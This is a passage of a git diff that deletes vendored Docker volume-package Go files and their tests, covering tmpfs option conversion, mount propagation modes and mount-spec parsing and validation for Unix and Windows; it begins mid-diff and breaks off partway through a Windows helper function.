--- a/vendor/github.com/docker/docker/volume/volume_copy_unix.go
+++ /dev/null
@@ -1,8 +0,0 @@
-// +build !windows
-
-package volume
-
-const (
-	// DefaultCopyMode is the copy mode used by default for normal/named volumes
-	DefaultCopyMode = true
-)
diff --git a/vendor/github.com/docker/docker/volume/volume_copy_windows.go b/vendor/github.com/docker/docker/volume/volume_copy_windows.go
deleted file mode 100644
index 798638c878..0000000000
--- a/vendor/github.com/docker/docker/volume/volume_copy_windows.go
+++ /dev/null
@@ -1,6 +0,0 @@
-package volume
-
-const (
-	// DefaultCopyMode is the copy mode used by default for normal/named volumes
-	DefaultCopyMode = false
-)
diff --git a/vendor/github.com/docker/docker/volume/volume_linux.go b/vendor/github.com/docker/docker/volume/volume_linux.go
deleted file mode 100644
index d4b4d800b2..0000000000
--- a/vendor/github.com/docker/docker/volume/volume_linux.go
+++ /dev/null
@@ -1,56 +0,0 @@
-// +build linux
-
-package volume
-
-import (
-	"fmt"
-	"strings"
-
-	mounttypes "github.com/docker/docker/api/types/mount"
-)
-
-// ConvertTmpfsOptions converts *mounttypes.TmpfsOptions to the raw option string
-// for mount(2).
-func ConvertTmpfsOptions(opt *mounttypes.TmpfsOptions, readOnly bool) (string, error) {
-	var rawOpts []string
-	if readOnly {
-		rawOpts = append(rawOpts, "ro")
-	}
-
-	if opt != nil && opt.Mode != 0 {
-		rawOpts = append(rawOpts, fmt.Sprintf("mode=%o", opt.Mode))
-	}
-
-	if opt != nil && opt.SizeBytes != 0 {
-		// calculate suffix here, making this linux specific, but that is
-		// okay, since API is that way anyways.
-
-		// we do this by finding the suffix that divides evenly into the
-		// value, returing the value itself, with no suffix, if it fails.
-		//
-		// For the most part, we don't enforce any semantic to this values.
-		// The operating system will usually align this and enforce minimum
-		// and maximums.
-		var (
-			size   = opt.SizeBytes
-			suffix string
-		)
-		for _, r := range []struct {
-			suffix  string
-			divisor int64
-		}{
-			{"g", 1 << 30},
-			{"m", 1 << 20},
-			{"k", 1 << 10},
-		} {
-			if size%r.divisor == 0 {
-				size = size / r.divisor
-				suffix = r.suffix
-				break
-			}
-		}
-
-		rawOpts = append(rawOpts, fmt.Sprintf("size=%d%s", size, suffix))
-	}
-	return strings.Join(rawOpts, ","), nil
-}
diff --git a/vendor/github.com/docker/docker/volume/volume_linux_test.go b/vendor/github.com/docker/docker/volume/volume_linux_test.go
deleted file mode 100644
index 40ce5525a3..0000000000
--- a/vendor/github.com/docker/docker/volume/volume_linux_test.go
+++ /dev/null
@@ -1,51 +0,0 @@
-// +build linux
-
-package volume
-
-import (
-	"strings"
-	"testing"
-
-	mounttypes "github.com/docker/docker/api/types/mount"
-)
-
-func TestConvertTmpfsOptions(t *testing.T) {
-	type testCase struct {
-		opt                  mounttypes.TmpfsOptions
-		readOnly             bool
-		expectedSubstrings   []string
-		unexpectedSubstrings []string
-	}
-	cases := []testCase{
-		{
-			opt:                  mounttypes.TmpfsOptions{SizeBytes: 1024 * 1024, Mode: 0700},
-			readOnly:             false,
-			expectedSubstrings:   []string{"size=1m", "mode=700"},
-			unexpectedSubstrings: []string{"ro"},
-		},
-		{
-			opt:                  mounttypes.TmpfsOptions{},
-			readOnly:             true,
-			expectedSubstrings:   []string{"ro"},
-			unexpectedSubstrings: []string{},
-		},
-	}
-	for _, c := range cases {
-		data, err := ConvertTmpfsOptions(&c.opt, c.readOnly)
-		if err != nil {
-			t.Fatalf("could not convert %+v (readOnly: %v) to string: %v",
-				c.opt, c.readOnly, err)
-		}
-		t.Logf("data=%q", data)
-		for _, s := range c.expectedSubstrings {
-			if !strings.Contains(data, s) {
-				t.Fatalf("expected substring: %s, got %v (case=%+v)", s, data, c)
-			}
-		}
-		for _, s := range c.unexpectedSubstrings {
-			if strings.Contains(data, s) {
-				t.Fatalf("unexpected substring: %s, got %v (case=%+v)", s, data, c)
-			}
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_linux.go b/vendor/github.com/docker/docker/volume/volume_propagation_linux.go
deleted file mode 100644
index 1de57ab52b..0000000000
--- a/vendor/github.com/docker/docker/volume/volume_propagation_linux.go
+++ /dev/null
@@ -1,47 +0,0 @@
-// +build linux
-
-package volume
-
-import (
-	"strings"
-
-	mounttypes "github.com/docker/docker/api/types/mount"
-)
-
-// DefaultPropagationMode defines what propagation mode should be used by
-// default if user has not specified one explicitly.
-// propagation modes
-const DefaultPropagationMode = mounttypes.PropagationRPrivate
-
-var propagationModes = map[mounttypes.Propagation]bool{
-	mounttypes.PropagationPrivate:  true,
-	mounttypes.PropagationRPrivate: true,
-	mounttypes.PropagationSlave:    true,
-	mounttypes.PropagationRSlave:   true,
-	mounttypes.PropagationShared:   true,
-	mounttypes.PropagationRShared:  true,
-}
-
-// GetPropagation extracts and returns the mount propagation mode. If there
-// are no specifications, then by default it is "private".
-func GetPropagation(mode string) mounttypes.Propagation {
-	for _, o := range strings.Split(mode, ",") {
-		prop := mounttypes.Propagation(o)
-		if propagationModes[prop] {
-			return prop
-		}
-	}
-	return DefaultPropagationMode
-}
-
-// HasPropagation checks if there is a valid propagation mode present in
-// passed string. Returns true if a valid propagation mode specifier is
-// present, false otherwise.
-func HasPropagation(mode string) bool {
-	for _, o := range strings.Split(mode, ",") {
-		if propagationModes[mounttypes.Propagation(o)] {
-			return true
-		}
-	}
-	return false
-}
diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go b/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go
deleted file mode 100644
index 46d0265062..0000000000
--- a/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go
+++ /dev/null
@@ -1,65 +0,0 @@
-// +build linux
-
-package volume
-
-import (
-	"strings"
-	"testing"
-)
-
-func TestParseMountRawPropagation(t *testing.T) {
-	var (
-		valid   []string
-		invalid map[string]string
-	)
-
-	valid = []string{
-		"/hostPath:/containerPath:shared",
-		"/hostPath:/containerPath:rshared",
-		"/hostPath:/containerPath:slave",
-		"/hostPath:/containerPath:rslave",
-		"/hostPath:/containerPath:private",
-		"/hostPath:/containerPath:rprivate",
-		"/hostPath:/containerPath:ro,shared",
-		"/hostPath:/containerPath:ro,slave",
-		"/hostPath:/containerPath:ro,private",
-		"/hostPath:/containerPath:ro,z,shared",
-		"/hostPath:/containerPath:ro,Z,slave",
-		"/hostPath:/containerPath:Z,ro,slave",
-		"/hostPath:/containerPath:slave,Z,ro",
-		"/hostPath:/containerPath:Z,slave,ro",
-		"/hostPath:/containerPath:slave,ro,Z",
-		"/hostPath:/containerPath:rslave,ro,Z",
-		"/hostPath:/containerPath:ro,rshared,Z",
-		"/hostPath:/containerPath:ro,Z,rprivate",
-	}
-	invalid = map[string]string{
-		"/path:/path:ro,rshared,rslave":   `invalid mode`,
-		"/path:/path:ro,z,rshared,rslave": `invalid mode`,
-		"/path:shared":                    "invalid volume specification",
-		"/path:slave":                     "invalid volume specification",
-		"/path:private":                   "invalid volume specification",
-		"name:/absolute-path:shared":      "invalid volume specification",
-		"name:/absolute-path:rshared":     "invalid volume specification",
-		"name:/absolute-path:slave":       "invalid volume specification",
-		"name:/absolute-path:rslave":      "invalid volume specification",
-		"name:/absolute-path:private":     "invalid volume specification",
-		"name:/absolute-path:rprivate":    "invalid volume specification",
-	}
-
-	for _, path := range valid {
-		if _, err := ParseMountRaw(path, "local"); err != nil {
-			t.Fatalf("ParseMountRaw(`%q`) should succeed: error %q", path, err)
-		}
-	}
-
-	for path, expectedError := range invalid {
-		if _, err := ParseMountRaw(path, "local"); err == nil {
-			t.Fatalf("ParseMountRaw(`%q`) should have failed validation. Err %v", path, err)
-		} else {
-			if !strings.Contains(err.Error(), expectedError) {
-				t.Fatalf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error())
-			}
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go b/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go
deleted file mode 100644
index 7311ffc2e0..0000000000
--- a/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go
+++ /dev/null
@@ -1,24 +0,0 @@
-// +build !linux
-
-package volume
-
-import mounttypes "github.com/docker/docker/api/types/mount"
-
-// DefaultPropagationMode is used only in linux. In other cases it returns
-// empty string.
-const DefaultPropagationMode mounttypes.Propagation = ""
-
-// propagation modes not supported on this platform.
-var propagationModes = map[mounttypes.Propagation]bool{}
-
-// GetPropagation is not supported. Return empty string.
-func GetPropagation(mode string) mounttypes.Propagation {
-	return DefaultPropagationMode
-}
-
-// HasPropagation checks if there is a valid propagation mode present in
-// passed string. Returns true if a valid propagation mode specifier is
-// present, false otherwise.
-func HasPropagation(mode string) bool {
-	return false
-}
diff --git a/vendor/github.com/docker/docker/volume/volume_test.go b/vendor/github.com/docker/docker/volume/volume_test.go
deleted file mode 100644
index 54df38053f..0000000000
--- a/vendor/github.com/docker/docker/volume/volume_test.go
+++ /dev/null
@@ -1,269 +0,0 @@
-package volume
-
-import (
-	"io/ioutil"
-	"os"
-	"runtime"
-	"strings"
-	"testing"
-
-	"github.com/docker/docker/api/types/mount"
-)
-
-func TestParseMountRaw(t *testing.T) {
-	var (
-		valid   []string
-		invalid map[string]string
-	)
-
-	if runtime.GOOS == "windows" {
-		valid = []string{
-			`d:\`,
-			`d:`,
-			`d:\path`,
-			`d:\path with space`,
-			// TODO Windows post TP5 - readonly support `d:\pathandmode:ro`,
-			`c:\:d:\`,
-			`c:\windows\:d:`,
-			`c:\windows:d:\s p a c e`,
-			`c:\windows:d:\s p a c e:RW`,
-			`c:\program files:d:\s p a c e i n h o s t d i r`,
-			`0123456789name:d:`,
-			`MiXeDcAsEnAmE:d:`,
-			`name:D:`,
-			`name:D::rW`,
-			`name:D::RW`,
-			// TODO Windows post TP5 - readonly support `name:D::RO`,
-			`c:/:d:/forward/slashes/are/good/too`,
-			// TODO Windows post TP5 - readonly support `c:/:d:/including with/spaces:ro`,
-			`c:\Windows`,             // With capital
-			`c:\Program Files (x86)`, // With capitals and brackets
-		}
-		invalid = map[string]string{
-			``:                                 "invalid volume specification: ",
-			`.`:                                "invalid volume specification: ",
-			`..\`:                              "invalid volume specification: ",
-			`c:\:..\`:                          "invalid volume specification: ",
-			`c:\:d:\:xyzzy`:                    "invalid volume specification: ",
-			`c:`:                               "cannot be `c:`",
-			`c:\`:                              "cannot be `c:`",
-			`c:\notexist:d:`:                   `source path does not exist`,
-			`c:\windows\system32\ntdll.dll:d:`: `source path must be a directory`,
-			`name<:d:`:                         `invalid volume specification`,
-			`name>:d:`:                         `invalid volume specification`,
-			`name::d:`:                         `invalid volume specification`,
-			`name":d:`:                         `invalid volume specification`,
-			`name\:d:`:                         `invalid volume specification`,
-			`name*:d:`:                         `invalid volume specification`,
-			`name|:d:`:                         `invalid volume specification`,
-			`name?:d:`:                         `invalid volume specification`,
-			`name/:d:`:                         `invalid volume specification`,
-			`d:\pathandmode:rw`:                `invalid volume specification`,
-			`con:d:`:                           `cannot be a reserved word for Windows filenames`,
-			`PRN:d:`:                           `cannot be a reserved word for Windows filenames`,
-			`aUx:d:`:                           `cannot be a reserved word for Windows filenames`,
-			`nul:d:`:                           `cannot be a reserved word for Windows filenames`,
-			`com1:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`com2:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`com3:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`com4:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`com5:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`com6:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`com7:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`com8:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`com9:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`lpt1:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`lpt2:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`lpt3:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`lpt4:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`lpt5:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`lpt6:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`lpt7:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`lpt8:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`lpt9:d:`:                          `cannot be a reserved word for Windows filenames`,
-			`c:\windows\system32\ntdll.dll`:    `Only directories can be mapped on this platform`,
-		}
-
-	} else {
-		valid = []string{
-			"/home",
-			"/home:/home",
-			"/home:/something/else",
-			"/with space",
-			"/home:/with space",
-			"relative:/absolute-path",
-			"hostPath:/containerPath:ro",
-			"/hostPath:/containerPath:rw",
-			"/rw:/ro",
-		}
-		invalid = map[string]string{
-			"":                "invalid volume specification",
-			"./":              "mount path must be absolute",
-			"../":             "mount path must be absolute",
-			"/:../":           "mount path must be absolute",
-			"/:path":          "mount path must be absolute",
-			":":               "invalid volume specification",
-			"/tmp:":           "invalid volume specification",
-			":test":           "invalid volume specification",
-			":/test":          "invalid volume specification",
-			"tmp:":            "invalid volume specification",
-			":test:":          "invalid volume specification",
-			"::":              "invalid volume specification",
-			":::":             "invalid volume specification",
-			"/tmp:::":         "invalid volume specification",
-			":/tmp::":         "invalid volume specification",
-			"/path:rw":        "invalid volume specification",
-			"/path:ro":        "invalid volume specification",
-			"/rw:rw":          "invalid volume specification",
-			"path:ro":         "invalid volume specification",
-			"/path:/path:sw":  `invalid mode`,
-			"/path:/path:rwz": `invalid mode`,
-		}
-	}
-
-	for _, path := range valid {
-		if _, err := ParseMountRaw(path, "local"); err != nil {
-			t.Fatalf("ParseMountRaw(`%q`) should succeed: error %q", path, err)
-		}
-	}
-
-	for path, expectedError := range invalid {
-		if mp, err := ParseMountRaw(path, "local"); err == nil {
-			t.Fatalf("ParseMountRaw(`%q`) should have failed validation. Err '%v' - MP: %v", path, err, mp)
-		} else {
-			if !strings.Contains(err.Error(), expectedError) {
-				t.Fatalf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error())
-			}
-		}
-	}
-}
-
-// testParseMountRaw is a structure used by TestParseMountRawSplit for
-// specifying test cases for the ParseMountRaw() function.
-type testParseMountRaw struct {
-	bind      string
-	driver    string
-	expDest   string
-	expSource string
-	expName   string
-	expDriver string
-	expRW     bool
-	fail      bool
-}
-
-func TestParseMountRawSplit(t *testing.T) {
-	var cases []testParseMountRaw
-	if runtime.GOOS == "windows" {
-		cases = []testParseMountRaw{
-			{`c:\:d:`, "local", `d:`, `c:\`, ``, "", true, false},
-			{`c:\:d:\`, "local", `d:\`, `c:\`, ``, "", true, false},
-			// TODO Windows post TP5 - Add readonly support {`c:\:d:\:ro`, "local", `d:\`, `c:\`, ``, "", false, false},
-			{`c:\:d:\:rw`, "local", `d:\`, `c:\`, ``, "", true, false},
-			{`c:\:d:\:foo`, "local", `d:\`, `c:\`, ``, "", false, true},
-			{`name:d::rw`, "local", `d:`, ``, `name`, "local", true, false},
-			{`name:d:`, "local", `d:`, ``, `name`, "local", true, false},
-			// TODO Windows post TP5 - Add readonly support {`name:d::ro`, "local", `d:`, ``, `name`, "local", false, false},
-			{`name:c:`, "", ``, ``, ``, "", true, true},
-			{`driver/name:c:`, "", ``, ``, ``, "", true, true},
-		}
-	} else {
-		cases = []testParseMountRaw{
-			{"/tmp:/tmp1", "", "/tmp1", "/tmp", "", "", true, false},
-			{"/tmp:/tmp2:ro", "", "/tmp2", "/tmp", "", "", false, false},
-			{"/tmp:/tmp3:rw", "", "/tmp3", "/tmp", "", "", true, false},
-			{"/tmp:/tmp4:foo", "", "", "", "", "", false, true},
-			{"name:/named1", "", "/named1", "", "name", "", true, false},
-			{"name:/named2", "external", "/named2", "", "name", "external", true, false},
-			{"name:/named3:ro", "local", "/named3", "", "name", "local", false, false},
-			{"local/name:/tmp:rw", "", "/tmp", "", "local/name", "", true, false},
-			{"/tmp:tmp", "", "", "", "", "", true, true},
-		}
-	}
-
-	for i, c := range cases {
-		t.Logf("case %d", i)
-		m, err := ParseMountRaw(c.bind, c.driver)
-		if c.fail {
-			if err == nil {
-				t.Fatalf("Expected error, was nil, for spec %s\n", c.bind)
-			}
-			continue
-		}
-
-		if m == nil || err != nil {
-			t.Fatalf("ParseMountRaw failed for spec '%s', driver '%s', error '%v'", c.bind, c.driver, err.Error())
-			continue
-		}
-
-		if m.Destination != c.expDest {
-			t.Fatalf("Expected destination '%s, was %s', for spec '%s'", c.expDest, m.Destination, c.bind)
-		}
-
-		if m.Source != c.expSource {
-			t.Fatalf("Expected source '%s', was '%s', for spec '%s'", c.expSource, m.Source, c.bind)
-		}
-
-		if m.Name != c.expName {
-			t.Fatalf("Expected name '%s', was '%s' for spec '%s'", c.expName, m.Name, c.bind)
-		}
-
-		if m.Driver != c.expDriver {
-			t.Fatalf("Expected driver '%s', was '%s', for spec '%s'", c.expDriver, m.Driver, c.bind)
-		}
-
-		if m.RW != c.expRW {
-			t.Fatalf("Expected RW '%v', was '%v' for spec '%s'", c.expRW, m.RW, c.bind)
-		}
-	}
-}
-
-func TestParseMountSpec(t *testing.T) {
-	type c struct {
-		input    mount.Mount
-		expected MountPoint
-	}
-	testDir, err := ioutil.TempDir("", "test-mount-config")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(testDir)
-
-	cases := []c{
-		{mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}},
-		{mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, RW: true}},
-		{mount.Mount{Type: mount.TypeBind, Source: testDir + string(os.PathSeparator), Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}},
-		{mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath + string(os.PathSeparator), ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}},
-		{mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: DefaultCopyMode}},
-		{mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath + string(os.PathSeparator)}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: DefaultCopyMode}},
-	}
-
-	for i, c := range cases {
-		t.Logf("case %d", i)
-		mp, err := ParseMountSpec(c.input)
-		if err != nil {
-			t.Fatal(err)
-		}
-
-		if c.expected.Type != mp.Type {
-			t.Fatalf("Expected mount types to match. Expected: '%s', Actual: '%s'", c.expected.Type, mp.Type)
-		}
-		if c.expected.Destination != mp.Destination {
-			t.Fatalf("Expected mount destination to match. Expected: '%s', Actual: '%s'", c.expected.Destination, mp.Destination)
-		}
-		if c.expected.Source != mp.Source {
-			t.Fatalf("Expected mount source to match. Expected: '%s', Actual: '%s'", c.expected.Source, mp.Source)
-		}
-		if c.expected.RW != mp.RW {
-			t.Fatalf("Expected mount writable to match. Expected: '%v', Actual: '%v'", c.expected.RW, mp.RW)
-		}
-		if c.expected.Propagation != mp.Propagation {
-			t.Fatalf("Expected mount propagation to match. Expected: '%v', Actual: '%s'", c.expected.Propagation, mp.Propagation)
-		}
-		if c.expected.Driver != mp.Driver {
-			t.Fatalf("Expected mount driver to match. Expected: '%v', Actual: '%s'", c.expected.Driver, mp.Driver)
-		}
-		if c.expected.CopyData != mp.CopyData {
-			t.Fatalf("Expected mount copy data to match. Expected: '%v', Actual: '%v'", c.expected.CopyData, mp.CopyData)
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/volume/volume_unix.go b/vendor/github.com/docker/docker/volume/volume_unix.go
deleted file mode 100644
index 0256ebb2ba..0000000000
--- a/vendor/github.com/docker/docker/volume/volume_unix.go
+++ /dev/null
@@ -1,138 +0,0 @@
-// +build linux freebsd darwin solaris
-
-package volume
-
-import (
-	"fmt"
-	"os"
-	"path/filepath"
-	"strings"
-
-	mounttypes "github.com/docker/docker/api/types/mount"
-)
-
-var platformRawValidationOpts = []func(o *validateOpts){
-	// need to make sure to not error out if the bind source does not exist on unix
-	// this is supported for historical reasons, the path will be automatically
-	// created later.
-	func(o *validateOpts) { o.skipBindSourceCheck = true },
-}
-
-// read-write modes
-var rwModes = map[string]bool{
-	"rw": true,
-	"ro": true,
-}
-
-// label modes
-var labelModes = map[string]bool{
-	"Z": true,
-	"z": true,
-}
-
-// BackwardsCompatible decides whether this mount point can be
-// used in old versions of Docker or not.
-// Only bind mounts and local volumes can be used in old versions of Docker.
-func (m *MountPoint) BackwardsCompatible() bool {
-	return len(m.Source) > 0 || m.Driver == DefaultDriverName
-}
-
-// HasResource checks whether the given absolute path for a container is in
-// this mount point. If the relative path starts with `../` then the resource
-// is outside of this mount point, but we can't simply check for this prefix
-// because it misses `..` which is also outside of the mount, so check both.
-func (m *MountPoint) HasResource(absolutePath string) bool {
-	relPath, err := filepath.Rel(m.Destination, absolutePath)
-	return err == nil && relPath != ".." && !strings.HasPrefix(relPath, fmt.Sprintf("..%c", filepath.Separator))
-}
-
-// IsVolumeNameValid checks a volume name in a platform specific manner.
-func IsVolumeNameValid(name string) (bool, error) {
-	return true, nil
-}
-
-// ValidMountMode will make sure the mount mode is valid.
-// returns if it's a valid mount mode or not.
-func ValidMountMode(mode string) bool {
-	if mode == "" {
-		return true
-	}
-
-	rwModeCount := 0
-	labelModeCount := 0
-	propagationModeCount := 0
-	copyModeCount := 0
-
-	for _, o := range strings.Split(mode, ",") {
-		switch {
-		case rwModes[o]:
-			rwModeCount++
-		case labelModes[o]:
-			labelModeCount++
-		case propagationModes[mounttypes.Propagation(o)]:
-			propagationModeCount++
-		case copyModeExists(o):
-			copyModeCount++
-		default:
-			return false
-		}
-	}
-
-	// Only one string for each mode is allowed.
-	if rwModeCount > 1 || labelModeCount > 1 || propagationModeCount > 1 || copyModeCount > 1 {
-		return false
-	}
-	return true
-}
-
-// ReadWrite tells you if a mode string is a valid read-write mode or not.
-// If there are no specifications w.r.t read write mode, then by default
-// it returns true.
-func ReadWrite(mode string) bool {
-	if !ValidMountMode(mode) {
-		return false
-	}
-
-	for _, o := range strings.Split(mode, ",") {
-		if o == "ro" {
-			return false
-		}
-	}
-	return true
-}
-
-func validateNotRoot(p string) error {
-	p = filepath.Clean(convertSlash(p))
-	if p == "/" {
-		return fmt.Errorf("invalid specification: destination can't be '/'")
-	}
-	return nil
-}
-
-func validateCopyMode(mode bool) error {
-	return nil
-}
-
-func convertSlash(p string) string {
-	return filepath.ToSlash(p)
-}
-
-func splitRawSpec(raw string) ([]string, error) {
-	if strings.Count(raw, ":") > 2 {
-		return nil, errInvalidSpec(raw)
-	}
-
-	arr := strings.SplitN(raw, ":", 3)
-	if arr[0] == "" {
-		return nil, errInvalidSpec(raw)
-	}
-	return arr, nil
-}
-
-func clean(p string) string {
-	return filepath.Clean(p)
-}
-
-func validateStat(fi os.FileInfo) error {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/volume/volume_unsupported.go b/vendor/github.com/docker/docker/volume/volume_unsupported.go
deleted file mode 100644
index ff9d6afa27..0000000000
--- a/vendor/github.com/docker/docker/volume/volume_unsupported.go
+++ /dev/null
@@ -1,16 +0,0 @@
-// +build !linux
-
-package volume
-
-import (
-	"fmt"
-	"runtime"
-
-	mounttypes "github.com/docker/docker/api/types/mount"
-)
-
-// ConvertTmpfsOptions converts *mounttypes.TmpfsOptions to the raw option string
-// for mount(2).
-func ConvertTmpfsOptions(opt *mounttypes.TmpfsOptions, readOnly bool) (string, error) {
-	return "", fmt.Errorf("%s does not support tmpfs", runtime.GOOS)
-}
diff --git a/vendor/github.com/docker/docker/volume/volume_windows.go b/vendor/github.com/docker/docker/volume/volume_windows.go
deleted file mode 100644
index 22f6fc7a14..0000000000
--- a/vendor/github.com/docker/docker/volume/volume_windows.go
+++ /dev/null
@@ -1,201 +0,0 @@
-package volume
-
-import (
-	"fmt"
-	"os"
-	"path/filepath"
-	"regexp"
-	"strings"
-)
-
-// read-write modes
-var rwModes = map[string]bool{
-	"rw": true,
-}
-
-// read-only modes
-var roModes = map[string]bool{
-	"ro": true,
-}
-
-var platformRawValidationOpts = []func(*validateOpts){
-	// filepath.IsAbs is weird on Windows:
-	//	`c:` is not considered an absolute path
-	//	`c:\` is considered an absolute path
-	// In any case, the regex matching below ensures absolute paths
-	// TODO: consider this a bug with filepath.IsAbs (?)
-	func(o *validateOpts) { o.skipAbsolutePathCheck = true },
-}
-
-const (
-	// Spec should be in the format [source:]destination[:mode]
-	//
-	// Examples: c:\foo bar:d:rw
-	//           c:\foo:d:\bar
-	//           myname:d:
-	//           d:\
-	//
-	// Explanation of this regex! Thanks @thaJeztah on IRC and gist for help. See
-	// https://gist.github.com/thaJeztah/6185659e4978789fb2b2. A good place to
-	// test is https://regex-golang.appspot.com/assets/html/index.html
-	//
-	// Useful link for referencing named capturing groups:
-	// http://stackoverflow.com/questions/20750843/using-named-matches-from-go-regex
-	//
-	// There are three match groups: source, destination and mode.
-	//
-
-	// RXHostDir is the first option of a source
-	RXHostDir = `[a-z]:\\(?:[^\\/:*?"<>|\r\n]+\\?)*`
-	// RXName is the second option of a source
-	RXName = `[^\\/:*?"<>|\r\n]+`
-	// RXReservedNames are reserved names not possible on Windows
-	RXReservedNames = `(con)|(prn)|(nul)|(aux)|(com[1-9])|(lpt[1-9])`
-
-	// RXSource is the combined possibilities for a source
-	RXSource = `((?P<source>((` + RXHostDir + `)|(` + RXName + `))):)?`
-
-	// Source. Can be either a host directory, a name, or omitted:
-	//  HostDir:
-	//    -  Essentially using the folder solution from
-	//       https://www.safaribooksonline.com/library/view/regular-expressions-cookbook/9781449327453/ch08s18.html
-	//       but adding case insensitivity.
-	//    -  Must be an absolute path such as c:\path
-	//    -  Can include spaces such as `c:\program files`
-	//    -  And then followed by a colon which is not in the capture group
-	//    -  And can be optional
-	//  Name:
-	//    -  Must not contain invalid NTFS filename characters (https://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx)
-	//    -  And then followed by a colon which is not in the capture group
-	//    -  And can be optional
-
-	// RXDestination is the regex expression for the mount destination
-	RXDestination = `(?P<destination>([a-z]):((?:\\[^\\/:*?"<>\r\n]+)*\\?))`
-	// Destination (aka container path):
-	//    -  Variation on hostdir but can be a drive followed by colon as well
-	//    -  If a path, must be absolute. Can include spaces
-	//    -  Drive cannot be c: (explicitly checked in code, not RegEx)
-
-	// RXMode is the regex expression for the mode of the mount
-	// Mode (optional):
-	//    -  Hopefully self explanatory in comparison to above regex's.
-	//    -  Colon is not in the capture group
-	RXMode = `(:(?P<mode>(?i)ro|rw))?`
-)
-
-// BackwardsCompatible decides whether this mount point can be
-// used in old versions of Docker or not.
-// Windows volumes are never backwards compatible.
-func (m *MountPoint) BackwardsCompatible() bool {
-	return false
-}
-
-func splitRawSpec(raw string) ([]string, error) {
-	specExp := regexp.MustCompile(`^` + RXSource + RXDestination + RXMode + `$`)
-	match := specExp.FindStringSubmatch(strings.ToLower(raw))
-
-	// Must have something back
-	if len(match) == 0 {
-		return nil, errInvalidSpec(raw)
-	}
-
-	var split []string
-	matchgroups := make(map[string]string)
-	// Pull out the sub expressions from the named capture groups
-	for i, name := range specExp.SubexpNames() {
-		matchgroups[name] = strings.ToLower(match[i])
-	}
-	if source, exists := matchgroups["source"]; exists {
-		if source != "" {
-			split = append(split, source)
-		}
-	}
-	if destination, exists := matchgroups["destination"]; exists {
-		if destination != "" {
-			split = append(split, destination)
-		}
-	}
-	if mode, exists := matchgroups["mode"]; exists {
-		if mode != "" {
-			split = append(split, mode)
-		}
-	}
-	// Fix #26329. If the destination appears to be a file, and the source is null,
-	// it may be because we've fallen through the possible naming regex and hit a
-	// situation where the user intention was to map a file into a container through
-	// a local volume, but this is not supported by the platform.
-	if matchgroups["source"] == "" && matchgroups["destination"] != "" {
-		validName, err := IsVolumeNameValid(matchgroups["destination"])
-		if err != nil {
-			return nil, err
-		}
-		if !validName {
-			if fi, err := os.Stat(matchgroups["destination"]); err == nil {
-				if !fi.IsDir() {
-					return nil, fmt.Errorf("file '%s' cannot be mapped. Only directories can be mapped on this platform", matchgroups["destination"])
-				}
-			}
-		}
-	}
-	return split, nil
-}
-
-// IsVolumeNameValid checks a volume name in a platform specific manner.
-func IsVolumeNameValid(name string) (bool, error) {
-	nameExp := regexp.MustCompile(`^` + RXName + `$`)
-	if !nameExp.MatchString(name) {
-		return false, nil
-	}
-	nameExp = regexp.MustCompile(`^` + RXReservedNames + `$`)
-	if nameExp.MatchString(name) {
-		return false, fmt.Errorf("volume name %q cannot be a reserved word for Windows filenames", name)
-	}
-	return true, nil
-}
-
-// ValidMountMode will make sure the mount mode is valid.
-// returns if it's a valid mount mode or not.
-func ValidMountMode(mode string) bool {
-	if mode == "" {
-		return true
-	}
-	return roModes[strings.ToLower(mode)] || rwModes[strings.ToLower(mode)]
-}
-
-// ReadWrite tells you if a mode string is a valid read-write mode or not.
-func ReadWrite(mode string) bool {
-	return rwModes[strings.ToLower(mode)] || mode == ""
-}
-
-func validateNotRoot(p string) error {
-	p = strings.ToLower(convertSlash(p))
-	if p == "c:" || p == `c:\` {
-		return fmt.Errorf("destination path cannot be `c:` or `c:\\`: %v", p)
-	}
-	return nil
-}
-
-func validateCopyMode(mode bool) error {
-	if mode {
-		return fmt.Errorf("Windows does not support copying image path content")
-	}
-	return nil
-}
-
-func convertSlash(p string) string {
-	return filepath.FromSlash(p)
-}
-
-func clean(p string) string {
-	if match, _ := regexp.MatchString("^[a-z]:$", p); match {
